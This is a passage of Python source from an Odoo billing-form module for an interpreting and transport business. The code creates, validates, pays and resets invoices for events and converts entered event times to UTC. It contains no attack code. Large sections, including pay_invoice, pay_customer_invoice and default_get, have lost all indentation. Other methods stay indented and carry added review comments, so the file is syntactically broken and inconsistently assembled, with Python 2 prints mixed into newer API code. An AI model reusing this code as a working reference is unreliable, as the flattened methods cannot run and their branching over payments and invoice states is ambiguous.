                for line in cur_obj.selected_event_id.supp_invoice_id2.invoice_line_ids:
                    if line.task_line_id:
                        inv_line_data = {}
                        if line.task_line_id.task_for == 'interpreter':
                            if not line.task_line_id.interpreter_id:
                                continue
                            self = self.with_context(interpreter=line.task_line_id.interpreter_id)
                            inv_line_data = task_obj._prepare_inv_line_interpreter(line.account_id and line.account_id.id or False, line.task_line_id,line.invoice_id.event_id,
                                                                                line.product_id)
                        elif line.task_line_id.task_for == 'transporter':
                            if not line.task_line_id.transporter_id:
                                continue
                            inv_line_data = task_obj._prepare_inv_line_transporter(line.account_id and line.account_id.id or False, line.task_line_id,line.invoice_id.event_id,
                                                                                line.product_id)
                        line.write(inv_line_data)
        else:
            raise UserError(_('Please Select the event from list first to invoice!'))
        return True
@api.multi
def pay_invoice(self):
''' Function to Pay Invoice '''
cur_obj = self
mod_obj = self.env['ir.model.data']
res = mod_obj.get_object_reference('bista_iugroup', 'invoice_payment_wizard_view')
res_id = res and res[1] or False,
if cur_obj.selected_event_id:
if cur_obj.selected_event_id.cust_invoice_id :
if cur_obj.selected_event_id.cust_invoice_id.state == 'open':
if self._context.get('invoice_type',False) and self._context.get('invoice_type',False) == 'customer':
if cur_obj.invoice_date:
cur_obj.selected_event_id.cust_invoice_id.write({'date_invoice':cur_obj.invoice_date})
amount = cur_obj.selected_event_id.cust_invoice_id.residual
if amount == 0.0:
amount = cur_obj.selected_event_id.cust_invoice_id.amount_total
val = {
'company_id': cur_obj.selected_event_id.cust_invoice_id.company_id and cur_obj.selected_event_id.cust_invoice_id.company_id.id or False,
'event_id': cur_obj.selected_event_id.id,
'invoice_id': cur_obj.selected_event_id.cust_invoice_id.id,
'amount': amount or 0.0,
'billing_form_id': self.ids[0],
}
self=self.with_context(invoice_id=cur_obj.selected_event_id.cust_invoice_id.id)
payment_form_id = self.env['invoice.payment.wizard'].create(val).id
return {
'name': _('Payment Form'),
'view_type': 'form',
'view_mode': 'form',
'view_id': [res_id[0]],
'res_model': 'invoice.payment.wizard',
'type': 'ir.actions.act_window',
'nodestroy': True,
'target': 'new',
'res_id': payment_form_id or False,
}
# else:
# raise osv.except_osv(_('Warning!'),_('Customer Invoice is not in open state !'))
if cur_obj.selected_event_id.supp_invoice_ids :
for supp_invoice_id in cur_obj.selected_event_id.supp_invoice_ids:
if supp_invoice_id.state == 'open':
if self._context.get('invoice_type',False) and self._context.get('invoice_type',False) == 'supplier':
if cur_obj.invoice_date:
supp_invoice_id.write({'date_invoice':cur_obj.invoice_date})
print "residual.......",supp_invoice_id.residual
amount = supp_invoice_id.residual
if amount == 0.0:
amount = supp_invoice_id.amount_total
val = {
'company_id': supp_invoice_id.company_id and supp_invoice_id.company_id.id or False,
'event_id': cur_obj.selected_event_id.id,
'invoice_id': supp_invoice_id.id,
'amount': amount or 0.0,
'billing_form_id': self.ids[0],
}
self = self.with_context(invoice_id=supp_invoice_id.id)
payment_form_id = self.env['invoice.payment.wizard'].create(val).id
return {
'name': _('Payment Form'),
'view_type': 'form',
'view_mode': 'form',
'view_id': [res_id[0]],
'res_model': 'invoice.payment.wizard',
'type': 'ir.actions.act_window',
'nodestroy': True,
'target': 'new',
'res_id': payment_form_id or False,
}
else:
continue
# else:
# raise osv.except_osv(_('Warning!'),_('Interpreter Invoice is not in open state !'))
if cur_obj.selected_event_id.supp_invoice_id2 :
if cur_obj.selected_event_id.supp_invoice_id2.state == 'open':
if self._context.get('invoice_type',False) and self._context.get('invoice_type',False) == 'transporter':
if cur_obj.invoice_date:
cur_obj.selected_event_id.supp_invoice_id2.write({'date_invoice':cur_obj.invoice_date})
# print "residual.......",cur_obj.selected_event_id.supp_invoice_id.residual
amount = cur_obj.selected_event_id.supp_invoice_id2.residual
if amount == 0.0:
amount = cur_obj.selected_event_id.supp_invoice_id2.amount_total
val = {
'company_id': cur_obj.selected_event_id.supp_invoice_id2.company_id and cur_obj.selected_event_id.supp_invoice_id2.company_id.id or False,
'event_id': cur_obj.selected_event_id.id,
'invoice_id': cur_obj.selected_event_id.supp_invoice_id2.id,
'amount': amount or 0.0,
'billing_form_id': self.ids[0],
}
self=self.with_context(invoice_id=cur_obj.selected_event_id.supp_invoice_id2.id)
payment_form_id = self.env['invoice.payment.wizard'].create(val).id
return {
'name': _('Payment Form'),
'view_type': 'form',
'view_mode': 'form',
'view_id': [res_id[0]],
'res_model': 'invoice.payment.wizard',
'type': 'ir.actions.act_window',
'nodestroy': True,
'target': 'new',
'res_id': payment_form_id or False,
}
# else:
# raise osv.except_osv(_('Warning!'),_('Interpreter Invoice is not in open state !'))
else:
raise UserError(_('No Customer Invoice is generated for this event!'))
else:
raise UserError(_('Please Select the event from list first to invoice!'))
return True
@api.multi
def pay_customer_invoice(self,journal_id, amount):
''' Function to Pay Customer Invoice '''
cur_obj = self
if cur_obj.selected_event_id:
if cur_obj.selected_event_id.cust_invoice_id :
if cur_obj.selected_event_id.cust_invoice_id.state == 'open':
cur_obj.selected_event_id.cust_invoice_id.pay_customer_invoice(journal_id, amount)
# self.write(cr, uid, ids, {'cust_invoice_state': 'paid'})
# cr.commit()
else:
raise UserError(_('Customer Invoice is not in open state !'))
else:
raise UserError(_('No Customer Invoice is generated for this event!'))
else:
raise UserError(_('Please Select the event from list first to invoice!'))
return True
    @api.multi
    def pay_supplier_invoice(self,journal_id, amount):
        '''Pay the first open interpreter invoice of the selected event.

        Already-paid invoices are skipped; an invoice in any other state
        (e.g. draft) raises.  Only one invoice is paid per call (break).
        '''
        cur_obj = self
        if cur_obj.selected_event_id:
            if cur_obj.selected_event_id.supp_invoice_ids :
                for supp_invoice_id in cur_obj.selected_event_id.supp_invoice_ids:
                    if supp_invoice_id.state == 'open' :#and len(cur_obj.selected_event_id.supp_invoice_ids)==1
                        supp_invoice_id.pay_supplier_invoice(journal_id, amount)
                        break
                        # self.write(cr, uid, ids, {'supp_invoice_state': 'paid'})
                        # cr.commit()
                    # else:
                    #     raise osv.except_osv(_('Warning!'),_('Interpreter Invoice is not in open state !'))
                    # elif supp_invoice_id.state == 'open' and len(cur_obj.selected_event_id.supp_invoice_ids)==2:
                    #     self.pool.get('account.invoice').pay_supplier_invoice(cr , uid, [supp_invoice_id.id], journal_id, amount, context)
                    #     break
                    # self.write(cr, uid, ids, {'supp_invoice_state': 'paid'})
                    # cr.commit()
                    elif supp_invoice_id.state == 'paid' :
                        continue
                    else:
                        raise UserError(_('Interpreter Invoice is not in open state !'))
            else:
                raise UserError(_('No Interpreter Invoice is generated for this event!'))
        else:
            raise UserError(_('Please Select the event from list first to invoice!'))
        return True
@api.multi
def pay_transporter_invoice(self,journal_id, amount):
''' Function to Pay Transporter Invoice '''
cur_obj = self
if cur_obj.selected_event_id:
if cur_obj.selected_event_id.supp_invoice_id2 :
if cur_obj.selected_event_id.supp_invoice_id2.state == 'open':
cur_obj.selected_event_id.supp_invoice_id2.pay_supplier_invoice(journal_id, amount)
# self.write(cr, uid, ids, {'supp_invoice_state': 'paid'})
# cr.commit()
else:
raise UserError(_('Transporter Invoice is not in open state !'))
else:
raise UserError(_('No Transporter Invoice is generated for this event!'))
else:
raise UserError(_('Please Select the event from list first to invoice!'))
return True
    @api.multi
    def reset_to_draft(self):
        ''' Function to Reset Customer and Supplier Invoices '''
        # Cancels and re-drafts every open invoice of the selected event.
        # Posted journal entries are made updatable ('update_posted') first so
        # the cancellation is accepted by accounting.
        cur_obj = self
        if cur_obj.selected_event_id:
            # --- customer invoice ---
            if cur_obj.selected_event_id.cust_invoice_id:
                if cur_obj.selected_event_id.cust_invoice_id.state == 'draft':
                    pass
                elif cur_obj.selected_event_id.cust_invoice_id.state == 'open':
                    inv_id = cur_obj.selected_event_id.cust_invoice_id
                    if inv_id.move_id and inv_id.move_id.state == 'posted':
                        journal = inv_id.journal_id
                        journal.write({'update_posted': True})
                    inv_id.action_cancel()
                    inv_id.action_invoice_draft()
                else:
                    raise UserError(_('Customer Invoice is not in open state !'))
            else:
                raise UserError(_('No Customer Invoice is generated for this event!'))
            # --- interpreter invoices ---
            if not cur_obj.selected_event_id.supp_invoice_ids and cur_obj.selected_event_id.event_type in ('lang_trans','language') :
                raise UserError(_('No Interpreter Invoice is generated for this event!'))
            if cur_obj.selected_event_id.supp_invoice_ids:
                for supp_invoice_id in cur_obj.selected_event_id.supp_invoice_ids:
                    # NOTE(review): a draft interpreter invoice raises here
                    # while a draft customer invoice is silently skipped above
                    # — confirm this asymmetry is intended.
                    if supp_invoice_id.state == 'draft':
                        raise UserError(_('Interpreter Invoice is not in open state !'))
                    elif supp_invoice_id.state == 'open':
                        inv_id = supp_invoice_id
                        if inv_id.move_id and inv_id.move_id.state == 'posted':
                            journal = inv_id.journal_id
                            journal.write({'update_posted': True})
                        inv_id.action_cancel()
                        inv_id.action_invoice_draft()
            # --- transporter invoice ---
            if not cur_obj.selected_event_id.supp_invoice_id2 and cur_obj.selected_event_id.event_type in ('lang_trans','transport') :
                raise UserError(_('No Transporter Invoice is generated for this event!'))
            if cur_obj.selected_event_id.supp_invoice_id2:
                if cur_obj.selected_event_id.supp_invoice_id2.state == 'draft':
                    pass
                elif cur_obj.selected_event_id.supp_invoice_id2.state == 'open':
                    inv_id = cur_obj.selected_event_id.supp_invoice_id2
                    if inv_id.move_id and inv_id.move_id.state == 'posted':
                        journal = inv_id.journal_id
                        journal.write({'update_posted': True})
                    inv_id.action_cancel()
                    inv_id.action_invoice_draft()
                else:
                    raise UserError(_('Transporter Invoice is not in open state !'))
        else:
            raise UserError(_('Please Select the event from list first to invoice!'))
        return True
@api.multi
def update_event_time(self):
''' Function to Update Actual Event Time '''
cur_obj = self
if cur_obj.selected_event_id:
cur_obj.selected_event_id.write({'actual_event_start': cur_obj.event_start,'actual_event_end': cur_obj.event_end})
# self.pool.get('event').write(cr, uid, [cur_obj.selected_event_id.id], {'actual_event_start': cur_obj.event_start,'actual_event_end': cur_obj.event_end})
return True
    @api.multi
    def validate_invoices(self):
        '''Validate (open) the draft customer / interpreter / transporter
        invoices of the selected event, optionally stamping them with the
        form's invoice date, then mark the event as 'invoiced'.
        '''
        cur_obj = self
        # wf_service = netsvc.LocalService("workflow")
        if not cur_obj.selected_event_id:
            raise UserError(_('Please Select the event from list first to invoice!'))
        if cur_obj.selected_event_id:
            # --- customer invoice ---
            if cur_obj.selected_event_id.cust_invoice_id :
                if cur_obj.invoice_date:
                    cur_obj.selected_event_id.cust_invoice_id.write({'date_invoice':cur_obj.invoice_date})
                if cur_obj.selected_event_id.cust_invoice_id.state == 'draft':
                    # wf_service.trg_validate(self._uid, 'account.invoice', cur_obj.selected_event_id.cust_invoice_id.id, 'invoice_open', self._cr)
                    cur_obj.selected_event_id.cust_invoice_id.action_invoice_open()
                    # self.write(cr, uid, ids, {'cust_invoice_state': 'open'})
                # else:
                #     raise osv.except_osv(_('Warning!'),_('Customer Invoice is already Validated!'))
            else:
                raise UserError(_('No Customer Invoice is generated for this event!'))
            # Presence checks depend on the event type (language / transport / both).
            if not cur_obj.selected_event_id.supp_invoice_id2 and cur_obj.selected_event_id.event_type in ('lang_trans','transport') :
                raise UserError(_('No Transporter Invoice is generated for this event!'))
            if not cur_obj.selected_event_id.supp_invoice_ids and cur_obj.selected_event_id.event_type in ('lang_trans','language') :
                raise UserError(_('No Interpreter Invoice is generated for this event!'))
            # --- interpreter invoices ---
            if cur_obj.selected_event_id.supp_invoice_ids :
                for supp_invoice_id in cur_obj.selected_event_id.supp_invoice_ids:
                    if cur_obj.invoice_date:
                        supp_invoice_id.write({'date_invoice':cur_obj.invoice_date})
                    if supp_invoice_id.state == 'draft':
                        # wf_service.trg_validate(self._uid, 'account.invoice', supp_invoice_id.id, 'invoice_open', self._cr)
                        supp_invoice_id.action_invoice_open()
                        # self.write(cr, uid, ids, {'supp_invoice_state': 'open'})
                    # else:
                    #     raise osv.except_osv(_('Warning!'),_('Supplier Invoice is already Validated!'))
            # else:
            #     raise osv.except_osv(_('Warning!'),_('No Interpreter Invoice is generated for this event!'))
            # print "cur_obj.selected_event_id.supp_invoice_id2cur_obj.selecte",cur_obj.selected_event_id.supp_invoice_id2
            # --- transporter invoice ---
            if cur_obj.selected_event_id.supp_invoice_id2 :
                if cur_obj.invoice_date:
                    cur_obj.selected_event_id.supp_invoice_id2.write({'date_invoice':cur_obj.invoice_date})
                if cur_obj.selected_event_id.supp_invoice_id2.state == 'draft':
                    # wf_service.trg_validate(self._uid, 'account.invoice', cur_obj.selected_event_id.supp_invoice_id2.id, 'invoice_open', self._cr)
                    cur_obj.selected_event_id.supp_invoice_id2.action_invoice_open()
                    # self.write(cr, uid, ids, {'supp_invoice_state': 'open'})
                # else:
                #     raise osv.except_osv(_('Warning!'),_('Supplier Invoice is already Validated!'))
            # else:
            #     raise osv.except_osv(_('Warning!'),_('No Supplier Invoice is generated for this event!'))
            cur_obj.selected_event_id.write({'state': 'invoiced'})
        return True
    @api.multi
    def create_invoices(self):
        '''Generate draft invoices for the selected event via its task's
        send_for_billing(), then reopen this billing form.

        Raises when invoices already exist, when the event has no timesheet
        (task), or when no event is selected.
        '''
        mod_obj = self.env['ir.model.data']
        cur_obj = self
        # Forward the chosen invoice date to the invoice creation chain.
        inv_date = cur_obj.invoice_date if cur_obj.invoice_date else False
        self=self.with_context(invoice_date=inv_date)
        if cur_obj.selected_event_id:
            if cur_obj.selected_event_id.cust_invoice_id or cur_obj.selected_event_id.supp_invoice_ids or cur_obj.selected_event_id.supp_invoice_id2 or cur_obj.selected_event_id.state == 'invoiced':
                raise UserError(_('Invoices are already generated for this event!'))
            if cur_obj.selected_event_id.task_id:
                # Let the billing chain know it was triggered from this form.
                if self.ids:
                    self=self.with_context(billing_form=True,billing_form_id=self.ids[0])
                cur_obj.selected_event_id.task_id.send_for_billing()
                # self.write(cr, uid, ids, {'cust_invoice_state': 'draft', 'invoice_exist': True, 'supp_invoice_state': 'draft'})
                self.write({'invoice_exist': True})
                # if cur_obj.event_line_id:
                #     self.pool.get('event.lines').write(cr, uid, [cur_obj.event_line_id.id], {'state': 'invoiced'})
            else:
                raise UserError(_('No Timesheet has been Entered for the selected Event yet!'))
            # Mirror the freshly created customer invoice onto the form.
            for billing_form in cur_obj:
                if billing_form.selected_event_id.cust_invoice_id:
                    billing_form.cust_invoice_id = billing_form.selected_event_id.cust_invoice_id.id
        else:
            raise UserError(_('Please Select the event from list first to invoice!'))
        view_id = mod_obj.get_object_reference('bista_iugroup', 'view_billing_form')
        # Trailing comma makes res_id a 1-tuple; consumed as res_id[0] below.
        res_id = view_id and view_id[1] or False,
        # my add
        self.write({'invoices_created': True})
        return {
            'name': _('Billing Form'),
            'view_type': 'form',
            'view_mode': 'form',
            'view_id': [res_id[0]],
            'res_model': 'billing.form',
            'type': 'ir.actions.act_window',
            'nodestroy': True,
            'target': 'current',
            'res_id': self.ids and self.ids[0] or False,
        }
@api.model
def default_get(self, fields):
'''Function to auto fill events for the selected event's interpreter '''
res = {}
res = super(billing_form , self).default_get(fields)
event_id = self._context.get('event_id', [])
if not event_id :
return res
event = self.env['event'].browse(event_id)
# history_obj = self.pool.get('interpreter.alloc.history')
event_ids, select_ids = [], []
select_obj = self.env['event.lines']
event_obj = self.env['event']
if event_id:
if event.event_type == 'language':
if event.assigned_interpreters:#,('event_date','=',event.event_date)
# print "assgnd intrptr M2m+++++++++",event.assigned_interpreters
for interpreter in event.assigned_interpreters:
if self._context.get('search_default_state',False):
if self._context.get('search_default_state') == 'unbilled':
event_ids.extend(event_obj.search([('assigned_interpreters','in',[interpreter.id]),('state','=','unbilled'),
('event_start_date','=',event.event_start_date)],).ids)
else:
event_ids.extend(event_obj.search([('assigned_interpreters','in',[interpreter.id]),('state','=','invoiced'),
('event_start_date','=',event.event_start_date)],).ids)
else:
event_ids.extend(event_obj.search([('assigned_interpreters','in',[interpreter.id]),('state','in',('invoiced','unbilled')),
('event_start_date','=',event.event_start_date)],).ids)
# print "in loop+",event_ids
# print "out loop+", list(set(event_ids))
for event_id in list(set(event_ids)):
event_brwsd = event_obj.browse(event_id)
select_ids.append(select_obj.create({'event_id': event_id,'name': event_brwsd.name}).id)
if event.event_type == 'transport':
if event.transporter_id:#,('event_date','=',event.event_date)
if self._context.get('search_default_state',False):
if self._context.get('search_default_state') == 'unbilled':
event_ids = event_obj.search([('transporter_id','=',event.transporter_id.id),('state','=','unbilled'),('event_start_date','=',event.event_start_date)])
else:
event_ids = event_obj.search([('transporter_id','=',event.transporter_id.id),('state','=','invoiced'),('event_start_date','=',event.event_start_date)])
else:
event_ids = event_obj.search([('transporter_id','=',event.transporter_id.id),('state','in',('invoiced','unbilled')),('event_start_date','=',event.event_start_date)])
for event_brwsd in event_ids:
select_ids.append(select_obj.create({'event_id': event_id,'name': event_brwsd.name}).id)
if event.event_type == 'translation':
if event.translator_id:#,('event_date','=',event.event_date)
if self._context.get('search_default_state',False):
if self._context.get('search_default_state') == 'unbilled':
event_ids = event_obj.search([('translator_id','=',event.translator_id.id),('state','=','unbilled'),('event_start_date','=',event.event_start_date)])
else:
event_ids = event_obj.search([('translator_id','=',event.translator_id.id),('state','=','invoiced'),('event_start_date','=',event.event_start_date)])
else:
event_ids = event_obj.search([('translator_id','=',event.translator_id.id),('state','in',('invoiced','unbilled')),('event_start_date','=',event.event_start_date)])
for event_brwsd in event_ids:
select_ids.append(select_obj.create({'event_id': event_id,'name': event_brwsd.name}).id)
if event.event_type == 'lang_trans' :
# if event.interpreter_id:#,('event_date','=',event.event_date)
#
# event_ids = event_obj.search( cr ,uid ,[('interpreter_id','=',event.interpreter_id.id),('transporter_id','=',event.transporter_id.id),('state','in',('invoiced','unbilled')),('event_start_date','=',event.event_start_date)],)
# for event_id in event_ids:
# event_brwsd = event_obj.browse(cr, uid,event_id )
# select_ids.append(select_obj.create(cr ,uid ,{'event_id': event_id,'name': event_brwsd.name}))
if event.assigned_interpreters:
for interpreter in event.assigned_interpreters:
if self._context.get('search_default_state',False):
if self._context.get('search_default_state') == 'unbilled':
event_ids.extend(event_obj.search([('assigned_interpreters','in',[interpreter.id]),('transporter_id','=',event.transporter_id.id),
('state','=','unbilled'),('event_start_date','=',event.event_start_date)]).ids)
else:
event_ids.extend(event_obj.search([('assigned_interpreters','in',[interpreter.id]),('transporter_id','=',event.transporter_id.id),
('state','=','invoiced'),('event_start_date','=',event.event_start_date)]).ids)
else:
event_ids.extend(event_obj.search([('assigned_interpreters','in',[interpreter.id]),('transporter_id','=',event.transporter_id.id),
('state','in',('invoiced','unbilled')),('event_start_date','=',event.event_start_date)],).ids)
# print "in loop+",event_ids
# print "out loop+", list(set(event_ids))
for event_id in list(set(event_ids)):
event_brwsd = event_obj.browse(event_id)
select_ids.append(select_obj.create({'event_id': event_id,'name': event_brwsd.name}).id)
#
# -------------------- Mehul code-------------------------------------------
event_obj = self.env['event']
for event_id in list(set(event_ids)):
date_new = event_obj.browse(event_id)
date_chg = date_new.event_start_date
res['invoice_date'] = date_chg
res['event_lines']= [(6, 0, select_ids)]
return res
    @api.model
    def create(self,vals):
        ''' Build and validate ``event_start``/``event_end`` before create.

        The form captures the event time as separate 12-hour components
        (``event_start_hr``/``event_start_min``/``am_pm`` and the ``_end``/
        ``am_pm2`` counterparts).  This override validates those raw
        components, combines them with ``event_start_date`` in the
        customer's (or user's) timezone, converts the result to UTC and
        writes it into ``vals`` as ``event_start``/``event_end`` before
        delegating to the standard ``create``.
        '''
        # Only do the work when at least one time-related field is present.
        if 'event_start_date' in vals or 'event_start_hr' in vals or 'event_start_min' in vals or 'event_end_hr' in vals or \
            'event_end_min' in vals or 'am_pm' in vals or 'am_pm2' in vals or 'customer_timezone' in vals:
            DATETIME_FORMAT = "%Y-%m-%d %H:%M:%S"
            # Timezone precedence: explicit customer timezone, then the
            # user's own timezone, then US/Pacific as a last resort.
            user = self.env.user
            customer_timezone = vals.get('customer_timezone',False)
            if customer_timezone:
                tz = pytz.timezone(customer_timezone) or pytz.utc
            elif user.tz:
                tz = pytz.timezone(user.tz) or pytz.utc
            else:
                tz = pytz.timezone("US/Pacific") or pytz.utc
            # Raw 12-hour components as entered on the form.
            event_start_date = vals.get('event_start_date',False)
            event_start_hr = int(vals.get('event_start_hr',0.0))
            event_start_min = int(vals.get('event_start_min',0.0))
            event_end_hr = int(vals.get('event_end_hr',0.0))
            event_end_min = int(vals.get('event_end_min',0.0))
            am_pm = vals.get('am_pm',False)
            am_pm2 = vals.get('am_pm2',False)
            # Validation runs on the raw components, i.e. *before* the
            # AM/PM-to-24h conversion below.
            if event_start_hr and event_start_hr > 12:
                raise UserError(_("Event start time hours can't be greater than 12 "))
            if event_start_min and event_start_min > 59:
                raise UserError(_("Event start time minutes can't be greater than 59 "))
            if event_end_hr and event_end_hr > 12:
                raise UserError(_(" Event end time hours can't be greater than 12 "))
            if event_end_min and event_end_min > 59:
                raise UserError(_("Event end time minutes can't be greater than 59 "))
            if event_start_hr < 1 and event_start_min < 1:
                raise UserError(_("Event start time can not be 0 or less than 0"))
            if event_end_hr < 1 and event_end_min < 1:
                raise UserError(_("Event end time can not be 0 or less than 0"))
            if event_start_date:
                # Convert the start time to 24-hour form (12am -> 0, pm adds 12).
                if am_pm and am_pm == 'pm':
                    if event_start_hr < 12:
                        event_start_hr += 12
                if am_pm and am_pm == 'am':
                    if event_start_hr == 12:
                        event_start_hr = 0
                if event_start_hr == 24: # for the 24 hour format
                    event_start_hr = 23
                    event_start_min = 59
                # Localise to the chosen timezone, then store as UTC.
                event_start = str(event_start_date) + ' ' + str(event_start_hr) + ':' + str(event_start_min) + ':00'
                local_dt = tz.localize(datetime.datetime.strptime(event_start,DATETIME_FORMAT), is_dst=None)
                utc_dt = local_dt.astimezone (pytz.utc).strftime (DATETIME_FORMAT)
                vals['event_start'] = utc_dt
                # Same conversion for the end time; note it reuses the
                # *start* date, so events never span midnight here.
                if am_pm2 and am_pm2 == 'pm':
                    if event_end_hr < 12:
                        event_end_hr += 12
                if am_pm2 and am_pm2 == 'am':
                    if event_end_hr == 12:
                        event_end_hr = 0
                if event_end_hr == 24: # for the 24 hour format
                    event_end_hr = 23
                    event_end_min = 59
                event_end = str(event_start_date) + ' ' + str(event_end_hr) + ':' + str(event_end_min) + ':00'
                local_dt1 = tz.localize(datetime.datetime.strptime(event_end,DATETIME_FORMAT), is_dst=None)
                utc_dt1 = local_dt1.astimezone (pytz.utc).strftime (DATETIME_FORMAT)
                vals['event_end'] = utc_dt1
                # Ordering checks use the local (pre-UTC) datetimes.
                if datetime.datetime.strptime(event_end,DATETIME_FORMAT) < datetime.datetime.strptime(event_start,DATETIME_FORMAT):
                    raise UserError(_('Event start time cannot be greater than event end time.'))
                elif datetime.datetime.strptime(event_end,DATETIME_FORMAT) == datetime.datetime.strptime(event_start,DATETIME_FORMAT):
                    raise UserError(_('Event start time and end time cannot be identical.'))
        return super(billing_form, self).create(vals)
    @api.multi
    def write(self, vals):
        ''' Keep invoices and ``event_start``/``event_end`` in sync on save.

        Two responsibilities:
        1. When ``invoice_date`` changes, push the new date onto every
           invoice of the selected event that is not yet paid/cancelled.
        2. When any time component changes, rebuild and re-validate the UTC
           ``event_start``/``event_end`` values (same logic as ``create``,
           except that missing components fall back to the stored record
           values instead of 0/False).
        '''
        # --- 1. Propagate a changed invoice date to the event's invoices.
        if vals.get('invoice_date',False):
            eve = self.selected_event_id
            if not eve:
                # The event may be set in this very write call.
                if 'selected_event_id' in vals and vals['selected_event_id']:
                    eve = self.env['event'].browse(vals.get('selected_event_id'))
            invoices = []
            if eve and eve.cust_invoice_id:
                invoices.append(eve.cust_invoice_id)
            if eve:
                invoices.extend([inv_id for inv_id in eve.supp_invoice_ids if inv_id])
            if eve and eve.supp_invoice_id2:
                invoices.append(eve.supp_invoice_id2)
            if invoices:
                for each_inv in invoices:
                    # Paid/cancelled invoices are silently left untouched.
                    if each_inv.state not in ['paid','cancel']:
                        each_inv.write({'date_invoice':vals.get('invoice_date',False)})
        # --- 2. Rebuild event_start/event_end from the 12-hour components.
        if 'event_start_date' in vals or 'event_start_hr' in vals or 'event_start_min' in vals or 'event_end_hr' in vals or \
            'event_end_min' in vals or 'am_pm' in vals or 'am_pm2' in vals or 'customer_timezone' in vals :
            DATETIME_FORMAT = "%Y-%m-%d %H:%M:%S"
            # Timezone precedence: customer timezone (new or stored), then
            # the user's timezone, then US/Pacific.
            user = self.env.user
            cur_obj = self
            tz = False
            customer_timezone = False
            if 'customer_timezone' in vals and vals['customer_timezone']:
                customer_timezone = vals.get('customer_timezone',False)
            else:
                customer_timezone = cur_obj.customer_timezone
            if customer_timezone:
                tz = pytz.timezone(customer_timezone) or pytz.utc
            elif user.tz:
                tz = pytz.timezone(user.tz) or pytz.utc
            else:
                tz = pytz.timezone("US/Pacific") or pytz.utc
            # Each component: prefer the incoming value, fall back to the
            # value already stored on the record.
            event_start_date ,event_start_hr ,event_start_min = False , 0 ,0
            event_end_hr , event_end_min , am_pm , am_pm2 = 0 , 0 , 'am' , 'pm'
            if 'event_start_date' in vals and vals['event_start_date']:
                event_start_date = vals.get('event_start_date',False)
            else:
                event_start_date = cur_obj.event_start_date
            if 'event_start_hr' in vals :
                event_start_hr = int(vals.get('event_start_hr',0.0))
            else:
                event_start_hr = int(cur_obj.event_start_hr)
            if 'event_start_min' in vals :
                event_start_min = int(vals.get('event_start_min',0.0))
            else:
                event_start_min = int(cur_obj.event_start_min)
            if 'event_end_hr' in vals :
                event_end_hr = int(vals.get('event_end_hr',0.0))
            else:
                event_end_hr = int(cur_obj.event_end_hr)
            if 'event_end_min' in vals :
                event_end_min = int(vals.get('event_end_min',0.0))
            else:
                event_end_min = int(cur_obj.event_end_min)
            if 'am_pm' in vals and vals['am_pm']:
                am_pm = vals.get('am_pm',False)
            else:
                am_pm = cur_obj.am_pm
            if 'am_pm2' in vals and vals['am_pm2']:
                am_pm2 = vals.get('am_pm2',False)
            else:
                am_pm2 = cur_obj.am_pm2
            # Validation runs on the raw 12-hour components, before the
            # AM/PM-to-24h conversion below.
            if event_start_hr and event_start_hr > 12:
                raise UserError(_("Event start time hours can't be greater than 12 "))
            if event_start_min and event_start_min > 59:
                raise UserError(_("Event start time minutes can't be greater than 59 "))
            if event_end_hr and event_end_hr > 12:
                raise UserError(_(" Event end time hours can't be greater than 12 "))
            if event_end_min and event_end_min > 59:
                raise UserError(_("Event end time minutes can't be greater than 59 "))
            if event_start_hr < 1 and event_start_min < 1:
                raise UserError(_("Event start time can not be 0 or less than 0"))
            if event_end_hr < 1 and event_end_min < 1:
                raise UserError(_("Event end time can not be 0 or less than 0"))
            if event_start_date:
                # Convert start time to 24-hour form (12am -> 0, pm adds 12).
                if am_pm and am_pm == 'pm':
                    if event_start_hr < 12:
                        event_start_hr += 12
                if am_pm and am_pm == 'am':
                    if event_start_hr == 12:
                        event_start_hr = 0
                if event_start_hr == 24: # for the 24 hour format
                    event_start_hr = 23
                    event_start_min = 59
                # Localise to the chosen timezone, then store as UTC.
                event_start = str(event_start_date) + ' ' + str(event_start_hr) + ':' + str(event_start_min) + ':00'
                local_dt = tz.localize(datetime.datetime.strptime(event_start,DATETIME_FORMAT), is_dst=None)
                utc_dt = local_dt.astimezone (pytz.utc).strftime (DATETIME_FORMAT)
                vals['event_start'] = utc_dt
                # Same conversion for the end time; it reuses the *start*
                # date, so events never span midnight here.
                if am_pm2 and am_pm2 == 'pm':
                    if event_end_hr < 12:
                        event_end_hr += 12
                if am_pm2 and am_pm2 == 'am':
                    if event_end_hr == 12:
                        event_end_hr = 0
                if event_end_hr == 24: # for the 24 hour format
                    event_end_hr = 23
                    event_end_min = 59
                event_end = str(event_start_date) + ' ' + str(event_end_hr) + ':' + str(event_end_min) + ':00'
                local_dt1 = tz.localize(datetime.datetime.strptime(event_end,DATETIME_FORMAT), is_dst=None)
                utc_dt1 = local_dt1.astimezone (pytz.utc).strftime (DATETIME_FORMAT)
                vals['event_end'] = utc_dt1
                # Ordering checks use the local (pre-UTC) datetimes.
                if datetime.datetime.strptime(event_end,DATETIME_FORMAT) < datetime.datetime.strptime(event_start,DATETIME_FORMAT):
                    raise UserError(_('Event start time cannot be greater than event end time.'))
                elif datetime.datetime.strptime(event_end,DATETIME_FORMAT) == datetime.datetime.strptime(event_start,DATETIME_FORMAT):
                    raise UserError(_('Event start time and end time cannot be identical.'))
        return super(billing_form , self).write(vals)
class account_invoice(models.Model):
    # Extends account.invoice with helpers that register and post an
    # account.payment against a single invoice.
    _inherit='account.invoice'
    @api.multi
    def pay_customer_invoice(self,journal_id, amount):
        ''' Register and post an inbound payment for a customer invoice.

        :param journal_id: id of the payment journal to use
        :param amount: payment amount (applied as-is; refund handling via
            context only — see note below)
        :return: id of the created, posted ``account.payment``
        '''
        inv_obj = self
        invoice_number = inv_obj.number
        payment_obj = self.env['account.payment']
        period_obj = self.env['account.period']
        bank_journal_ids = [journal_id]
        # Pay the commercial parent when the invoice partner is a contact.
        payment_partner_id = inv_obj.partner_id.id
        if inv_obj.partner_id.parent_id:
            payment_partner_id = inv_obj.partner_id.parent_id.id
        self=self.with_context(
            default_partner_id=payment_partner_id or inv_obj.partner_id.id,
            default_amount=amount,
            default_name=inv_obj.name,
            close_after_process=True,
            invoice_type=inv_obj.type,
            invoice_id=inv_obj.id,
            journal_id=bank_journal_ids[0],
            default_type=inv_obj.type in ('out_invoice','out_refund') and 'receipt' or 'payment'
        )
        # NOTE(review): for refunds only the context default is negated;
        # ``payment_data['amount']`` below still uses the positive amount —
        # confirm this is intentional.
        if inv_obj.type in ('out_refund','in_refund'):
            self=self.with_context(default_amount=-amount)
        date = fields.Date.context_today(self)
        # First inbound payment method (e.g. manual) — assumes one exists.
        payment_method_id=self.env['account.payment.method'].search([('payment_type','=','inbound')],limit=1).id
